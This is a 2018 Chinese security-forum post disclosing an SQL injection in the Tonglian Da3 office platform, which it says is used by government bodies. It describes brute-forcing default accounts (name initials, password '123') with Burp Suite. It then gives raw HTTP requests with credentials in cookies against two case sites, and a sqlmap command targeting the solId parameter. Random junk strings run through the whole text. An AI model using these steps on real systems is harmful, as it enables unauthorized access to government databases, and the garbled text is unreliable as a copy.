找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1319|回复: 0
打印 上一主题 下一主题

同联Da3协同办公平台前台通用sql injection漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2018-10-20 20:15:17 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式

# @( y; J& i4 H; J: ?/ T) i) g L
* \" H9 G7 ^& U( C$ C8 y' a

! l) `, p* m5 I

# t& V/ ]% ^. t 平台简介:. O0 L5 ? w3 r* Y. A

6 U2 x0 \* Z7 q7 u& w @( w3 f

! R$ d1 S$ B( E, W- D  ) Z3 O0 z6 b- y- v5 D; \* ^

' g7 h) n% b0 V

7 N" y. U- u& R 北京同联信息技术有限公司(以下简称同联)由用友政务与用友原行业事业部团队合伙出资成立。同联以“为全国各级政府单位提供信息化咨询规划、建设解决方案和信息化运维服务,以加强各级政府的精细化、智能化管理,形成高效、敏捷、便民的新型政府。”为使命,致力于为各级政府单位提供专业、标准、灵活、易用的信息化产品及专业的服务。
: W, h3 q Y" r) n+ v 同联面向政府单位提供专业、标准、灵活、易用的信息化产品。针对各级政府单位,分别提供以“移动政务办公”为主的Da3系列管理软件;针对政法单位提供以“协同办案”为核心的政法协同办案系统等。
% I$ m4 n! h8 W8 j- Y- a% G) Z 同联本着“协作、专业、创新”的工作方针,为推动各级政府单位信息化、促进各级政府快速转型为 “智慧型政府”做出积极贡献! & ?/ h8 W4 s& @9 Y. u9 S

& T+ j5 d" L9 R4 \2 b' j; Y' r

5 L: m( R; v" ?; [1 X   ; j' W6 O2 Q" h5 A- j

! `% Q# F: i7 i. Y1 C, g1 ]4 ]

! c3 R0 F7 J4 T2 ] 由于此程序为新开发的程序,故能找到的案例并不多,下面附案例地址: 0 E1 G0 X* M; S. |

7 r: ^! Z9 c# O( Q% G7 a: L

0 b% s& _4 N9 [5 F   7 L/ H$ M: W" E6 P4 X7 [

7 B" |# P& i- z

1 e9 |9 V/ [: |9 I# U+ b* D http://1.1.1.1:7197/cap-aco/#(案例2-) : v, v4 ~0 O" h9 G6 X. j

( z: d( q2 O( c, H i* L

2 ~7 Q7 w( c/ a0 c% Y7 Z$ s1 E; P http://www.XXOO.com (案例1-官网网站)) n' ?+ f. `$ X. T+ K" V9 [ j

# v( I) K0 L+ U, ]( u8 V: \

9 m+ z$ G* `% C  8 H8 z U" x0 I4 q8 w8 Z

h* M: c" b$ R7 Z

" O* V7 [) z- q% W 漏洞详情: 8 S1 E: x, _" \. B/ o7 F( r

/ `! V8 M7 o6 |2 [/ a, y

0 ~: y% Y& u- N6 J  初步确定平台的默认账号为姓名的首字母小写,初始密码为123,为了能够更好的模拟入侵,使用黑盒测试手段进行测试 , T! }7 n# Z# o: M+ F7 y

1 k' ]2 P0 D$ p

; ^ I9 y8 ^* y/ C6 Z7 B      首先使用burpsuite代理,然后再用黑客字典生成一个全英文小写的3位字典,利用burpsuite进行暴力破解,破解结果如图:8 D/ U/ n- F2 |' a* Z

$ d5 t& d. {3 F: s

) j* S7 ?( _3 V; V( S   ) q! }1 R/ S" P+ A, e9 D, Z

9 @: c' i7 s ]& T6 L

) n3 M8 ]0 }# _4 I, {1 P- s+ }8 W  5 \; X' q5 \. c% P3 F# r3 F! K

! t+ G5 R% i4 u0 G R

0 ^! X7 a1 J- q% t3 C status为302即表示破解成功,然后找个破解成功的账号登录系统。经过长时间的手工测试发现在发文管理模块抓包,抓包的数据分别如下: / }! l4 U/ _* W5 n7 B; B) J' R

, v+ C6 y n0 O/ q0 h% T

! ?4 T6 d y/ n7 i9 Y2 E0 i 1、案例1-官方网站2 Z L5 T/ v2 B! Y5 ?9 {

0 H8 b1 J6 _# Y4 f' Q

" J# ^* _) T% t+ C GET /bpmRuBizInfoController/findBpmRuBizInfoBySolId?rows=10&page=0&solId=42b0234e-d5dc-402d-9cef-1ce38cbae480&state=&title=1111&sortOrder=DESC&query=bizTitle_%3D%26URGENCY_%3D%26STATE_%3D%26startTime%3D%26endTime%3D&_=1510060789826 HTTP/1.16 O- q7 Z. H$ k% k

% n' d6 [: f% q

' L3 K; B, x# `" x6 R' r1 { Host: www.XXOO.com: V5 j- N/ }" b2 f( x& A

" j% Y7 p9 D: `7 x

" C/ z- d! ~6 _! k2 F, q Proxy-Connection: Keep-Alive/ w8 e) J6 h$ r& O' T5 ^" P! @

) C( F) d, U: H6 f2 p8 Q

+ t. \8 z! f# v6 l( B Accept: application/json, text/javascript, */*; q=0.01 + H) s- a. S" @6 b! p

3 W5 R% n9 M$ y; i7 o3 g$ y

+ K6 r, I0 t. o+ B) M Accept-Language: zh-CN , V( c+ V+ M, s

& P" M0 y& Y. I! Y

2 _; ^, i/ q1 j3 H- P/ V/ } Content-Type: application/json1 b; R' v4 D6 U/ h4 R! J

$ n; s; F0 y0 {6 i/ E3 `+ |

. L5 b/ K o; k User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0; SE 2.X MetaSr 1.0) like Gecko 7 q1 m6 q" f+ W& s' r

; E" V+ s* |6 n A/ U" b0 j

( V3 E, X2 x: a3 G0 {* L* h0 ? X-Requested-With: XMLHttpRequest / E9 \. H1 b' k1 J# U" c+ Y0 l( L

; U" u* y) {, m8 K0 }

0 L! s- E. \% N! |* G/ [" W v9 d Referer: http://www.XXOO.com/bizRunContro ... 80?modCode=1008M002& q3 I' r4 a. ^& a2 I9 d

1 y/ e2 ~& d9 z

& }5 ^& D' v$ K Accept-Encoding: gzip, deflate, sdch: X- w) k: r$ f, }- s

/ q7 c+ e! i2 A7 y6 u4 f0 F9 u

& \2 T5 P3 P- v4 a1 P Cookie: username=chm; password=123; rememberme=1; autoSubmit=1; sid=2cf5142f-6c1e-4cbb-89d8-2ebd08438b2e/ W. n0 C, ]) R( `" V; p

! G- Y) ^& Z9 ]9 M

; y2 o' t, y8 n9 Q 将上面post数据包复制到txt文本里保存为tl.txt并将其放到sqlmap根目录下利用sqlmap注入命令为:sqlmap.py -r tl.txt --dbms=mysql --level 5 --risk 3 --tamper=space2hash.py -p solId --is-dba 注入如图:+ A) l- p% d0 }% [- b

; E$ _* [# A" h4 h) K' U# L

8 W, M) s& Q& A   ! M/ [6 Q3 D/ ^8 d

# w, N. e/ T) L

3 U" I2 b) |- e' E   - Y- @+ o8 b4 y

$ \7 w7 C1 j8 H. p1 {* {. w

+ I9 M/ g) y N \7 ~) p( X   ( M# e% e9 H$ t

# q+ E, C- e5 {; b% `3 n

6 g& A6 h( h6 Y* X$ d6 Y   / J; }4 f7 D* L+ r; V3 d Z" V

6 A. }0 c- }% H6 m. O! t) ?

$ W* f6 _2 }+ j% j5 e  9 _: p8 l: p* s' J y8 p2 x

/ Q4 V- q, v- O5 `

9 X [5 o) Z" P% J; F9 ^& O* E 2、案例2-某天河云平台 . k3 g) d2 x0 a; e {" t+ O

5 n) q4 F) |8 |, O/ b8 | Z

$ Y# C) G, a! m# L9 m' E GET /cap-aco/bpmRuBizInfoController/findBpmRuBizInfoBySolId?rows=10&page=0&solId=af056885-4ae5-4e0b-8a0d-c413a786f2db&state=&title=11111&sortOrder=DESC&query=bizTitle_%3D%26URGENCY_%3D%26STATE_%3D%26startTime%3D%26endTime%3D&_=1510047738662 HTTP/1.1" s* F5 N! a9 j- [# z3 W3 v

2 A' L9 N6 {! V$ e4 l% A9 A

0 b/ H' T+ Z! u Host: 1.1.1.:71979 z, {6 d. r. H% x

( u a2 T, Y0 |" J$ U8 {3 M

! i" s( ]* D/ G9 a$ J& p$ o! Z Accept: application/json, text/javascript, */*; q=0.01 0 y0 d" \0 M& r5 g$ ]

7 w2 w8 p1 {+ v; u

* D/ e9 s7 K0 }: h, V X-Requested-With: XMLHttpRequest7 h' _4 s% n5 }6 }& g, C4 i- k: R

* f* f& }; y6 z- Z: {& _

1 D" m# _( |, N% ? User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.221 Safari/537.36 SE 2.X MetaSr 1.0 3 Z1 f) g/ S0 Z* `- X8 x8 \

+ }* c( k6 F, F7 P0 S. z

4 t0 O. I- z0 N0 E0 c Content-Type: application/json! Y6 S% b6 M# p

6 B! ?! _9 ?- r8 K$ V1 Z( @7 o) w

! V7 g; X/ b& w5 J* f+ \ Referer: http://1.1.1.1:7197/cap-aco/bizR ... 86f2db?modCode=1008& A; p" W# L- P' Z: |

4 w a, O6 u# I0 n9 Z% c& v% Q7 }

3 B, V7 Q9 \* z% U6 E) E6 ?7 k Accept-Language: zh-CN,zh;q=0.8- [9 J' t$ @2 ?6 K' h

% t, E1 s% N% J' _% I0 u- `

* i7 Z8 e6 a* ]$ A Cookie: autoSubmit=1; sid=4e333ec9-d194-456b-bb08-4ff64c6eb1fc; username=lxr; password=123; rememberme=1; autoSubmit=1 " o; ]0 S" T; ]8 C2 m# c# N* z

- n4 v) I. H- L: Z- `

3 l6 i( H/ Q* `+ k: u" s1 s Connection: close& r) Y5 O3 r: y- d1 e$ v

( v- Q% R( u) @

. q0 q9 E8 a; X) z! ] 将上面post数据包复制到txt文本里保存为tl.txt并将其放到sqlmap根目录下利用sqlmap注入命令为:sqlmap.py -r 1.txt --dbms=mysql --level 5 --risk 3 --tamper=space2hash.py -p solId --is-dba 注入如图: , H" g1 O% k; N! x; ]$ h

+ a- f! X# }9 j/ ?4 I

h: ~ |' I4 H1 W2 {/ C: y& v) b   3 p' s+ P2 j* H% C4 c

^4 e& B0 r4 I. x& v% t4 j/ }

" v+ C5 \" }+ F: t! a! a5 q9 s
# s+ @8 ~; R `7 h

回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表